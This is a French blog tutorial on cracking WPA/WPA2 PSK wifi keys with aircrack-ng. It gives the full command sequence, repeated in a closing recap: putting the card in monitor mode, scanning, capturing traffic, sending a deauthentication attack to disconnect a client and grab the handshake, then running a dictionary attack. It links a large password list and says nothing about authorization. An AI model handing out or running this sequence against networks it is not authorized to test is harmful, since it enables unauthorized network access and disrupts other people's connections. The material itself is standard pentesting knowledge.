lundi , 23 avril 2018
Breaking News

Hack du Wifi sécurisé avec WPA/WPA2

Nous allons voir aujourd’hui comment il est possible de casser la sécurité d’un réseau sans fil (wifi) sécurisé avec WPA2 ou WPA, et pour faire nous utiliserons la distribution Kali Linux ou BackTrack, les deux sont dédiées au penetration testing, même si l’attaque peut être réalisée aussi avec toute autre distribution Linux équipée de la suite aircrack-ng couplée à une carte Wifi compatible.

Prérequis:

– Une carte Wifi compatible avec le mode monitoring & injection de paquets.
– La suite aircrack-ng disponible dans Kali Linux et BackTrack
– Un dictionnaire, comme celui-ci avec 1,5 milliard de mots de passe.

Note: Je recommande Kali Linux (ou BackTrack) pour des raisons de compatibilité avec les cartes Wifi, vu que ces distributions utilisent un noyau kernel avec les derniers patchs pour le support d’injection de paquets.

Hack du Wifi sécurisé avec WPA/WPA2 PSK (TKIP ou AES/CCMP)

1 – Démarrage de l’interface Wifi (wlan0) en mode monitor:

airmon-ng start wlan0

Hack Wifi WPA2Cliquez sur l’image pour l’agrandir

2 – Démarrage d’un scan des réseaux Wifi disponibles:

airodump-ng mon0

Hack Wifi WPA2 - AirodumpCliquez sur l’image pour l’agrandir

3 – Prise en note des informations du réseau Wifi ciblé:

ESSID : black-box
BSSID : 00:1C:C5:0A:5C:05
Channel (CH) : 11
Client (STATION) : 30:14:4A:34:71:65
Sécurité : WPA2 PSK (CCMP)

J’arrête la précédente commande, pour lancer une nouvelle plus précise, tout en enregistrant cette fois-ci le trafic capturé dans un fichier output:

airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0

airodump-ng-hack-wifi-wpa2-secCliquez sur l’image pour l’agrandir

4 – Pour pouvoir craquer WPA/WPA2 PSK il vous faudra intercepter le WPA Handshake, et pour faire rien de plus simple, il suffit de déconnecter brièvement déjà connecté au réseau Wifi ciblé:

aireplay-ng --deauth 1 -a 00:1C:C5:0A:5C:05 -c 30:14:4A:34:71:65 mon0

aireplay-ng-hack-wifi-wpa2Cliquez sur l’image pour l’agrandir

On retourne à notre fenêtre airodump-ng pour vérifier que nous avons capturé correctement le WPA Handshake

airodump-ng-hack-wifi-wpa2-handshakeCliquez sur l’image pour l’agrandir

5 – Dans une nouvelle console, je lance aircrack-ng pour casser la clef WPA2 en définissant le fichier de capture en cours output*.cap et mon dictionnaire:

aircrack-ng output-*.cap -w /usr/share/dict/wordlist

aircrack-ng-hack-wifi-wpa2Cliquez sur l’image pour l’agrandir

Je laisse mouliner, ça pourra prendre 10 secondes ou des heures, tout dépendra de la complexité de la clef WPA2 utilisée, dans mon cas c’est rapide parce que j’ai mis comme clef Casablanca.

Remarques:
– Impossible de casser WPA/WPA2 sans aucun client connecté au réseau wifi ciblé.
– Impossible de casser WPA/WPA2 si votre dictionnaire ne comporte pas la clef.

Récapitulatif des commandes:

[email protected]:~# airmon-ng start wlan0
[email protected]:~# airodump-ng mon0
[email protected]:~# airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
[email protected]:~# aireplay-ng --deauth 1 -a 00:1C:C5:0A:5C:05 -c 30:14:4A:34:71:65 mon0
[email protected]:~# aircrack-ng output-*.cap -w /usr/share/dict/wordlist

Sur ce, je vous donne rendez-vous pour très bientôt, je vous prépare de bonnes surprises, de très très bonnes surprises.

About Youssef BENKHOUYA

Born to be a NINJA

Check Also

Android 4.2.1b pour Galaxy S3

La nouvelle version Android 4.2.1 Jelly Bean du Galaxy S3 dont la sortie officielle est …

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *